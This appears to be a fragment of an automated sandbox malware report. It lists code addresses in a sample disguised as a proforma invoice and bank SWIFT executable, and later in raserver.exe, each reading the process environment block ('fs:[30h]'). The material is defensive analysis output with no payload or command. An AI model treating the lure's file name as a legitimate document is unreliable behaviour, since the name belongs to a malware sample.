          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B11DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B12581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B98DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B66DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B6A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B14D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B07D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B23D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B63540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B93D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B28EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B9FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B9FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B18E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BA1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BAAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B67794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00BB8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AFEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D88CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74496 mov eax, dword ptr fs:[00000030h]
